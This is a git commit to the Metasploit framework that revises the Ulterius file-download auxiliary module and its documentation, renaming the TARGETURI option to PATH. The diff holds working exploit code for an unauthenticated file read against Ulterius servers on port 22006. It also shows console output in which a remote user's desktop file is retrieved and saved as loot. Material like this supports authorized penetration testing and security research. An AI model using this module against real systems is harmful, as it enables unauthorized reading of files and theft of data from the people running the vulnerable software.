Avoid target_uri.path

wchen-r7 · wchen-r7 · commit 949b474a0ac1 · 2018-02-15T16:31:09.000-06:00
It doesn't look like target_uri.path is suitable for this scenario,
because it causes our input to be modified and hard to use.
diff --git a/documentation/modules/auxiliary/admin/http/ulterius_file_download.md b/documentation/modules/auxiliary/admin/http/ulterius_file_download.md
@@ -22,7 +22,7 @@ Note: The [EDB PoC](https://www.exploit-db.com/exploits/43141/) used relative pa
 
 ## Options
 
-**TARGETURI**
+**PATH**
 
 This option specifies the absolute or relative path of the file to download. (default: `/…/fileIndex.db`)
 
@@ -36,7 +36,7 @@ Note: If you are using relative paths, use three periods when traversing down a
 - [ ] `set rhost <rhost>`
 - [ ] `run`
 - [ ] Verify loot contains file system paths from remote file system.
-- [ ] `set targeturi '/<DriveLetter>:/<path>/<to>/<file>'`
+- [ ] `set path '<DriveLetter>:/<path>/<to>/<file>'`
 - [ ] `run`
 - [ ] Verify contents of file
 
@@ -53,11 +53,11 @@ msf5 auxiliary(admin/http/ulterius_file_download) > run
 [*] Starting to parse fileIndex.db...
 [*] Remote file paths saved in: filepath0
 [*] Auxiliary module execution completed
-msf5 auxiliary(admin/http/ulterius_file_download) > set targeturi '/C:/users/pwnduser/desktop/tmp.txt'
-targeturi => /C:/users/pwnduser/desktop/tmp.txt
+msf5 auxiliary(admin/http/ulterius_file_download) > set path 'C:/users/pwnduser/desktop/tmp.txt'
+path => C:/users/pwnduser/desktop/tmp.txt
 msf5 auxiliary(admin/http/ulterius_file_download) > run
 
-[*] /C:/users/pwnduser/desktop/tmp.txt
+[*] C:/users/pwnduser/desktop/tmp.txt
 [*] File contents saved: filepath1
 [*] Auxiliary module execution completed
 msf5 auxiliary(admin/http/ulterius_file_download) >
diff --git a/modules/auxiliary/admin/http/ulterius_file_download.rb b/modules/auxiliary/admin/http/ulterius_file_download.rb
@@ -35,7 +35,7 @@ def initialize(info = {})
       register_options(
         [
           Opt::RPORT(22006),
-          OptString.new('TARGETURI', [true, 'Path to the file to download', '/.../fileIndex.db']),
+          OptString.new('PATH', [true, 'Path to the file to download', '/.../fileIndex.db']),
         ])
   end
 
@@ -73,24 +73,32 @@ def inflate_parse(data)
   end
 
   def run
+    path = datastore['PATH']
+    # Always make sure there is a starting slash so as an user,
+    # we don't need to worry about it.
+    path = "/#{path}" if path && path[0] != '/'
+
+    print_status("Requesting: #{path}")
+
     begin
       res = send_request_cgi({
-        'uri' => normalize_uri(target_uri.path),
+        'uri' => normalize_uri(path),
         'method' => 'GET'
       })
     rescue Rex::ConnectionRefused, Rex::ConnectionTimeout,
            Rex::HostUnreachable, Errno::ECONNRESET => e
       vprint_error("Failed: #{e.class} - #{e.message}")
       return
     end
+
     if res && res.code == 200
-      if target_uri.path =~ /fileIndex\.db/i
+      if path =~ /fileIndex\.db/i
         inflate_parse(res.body)
       else
-        print_status(target_uri.path)
-        myloot = store_loot('ulterius.file.download', 'text/plain', datastore['RHOST'], res.body, target_uri.path, 'Remote file system')
+        myloot = store_loot('ulterius.file.download', 'text/plain', datastore['RHOST'], res.body, path, 'Remote file system')
         print_status("File contents saved: #{myloot.to_s}")
       end
     end
   end
+
 end
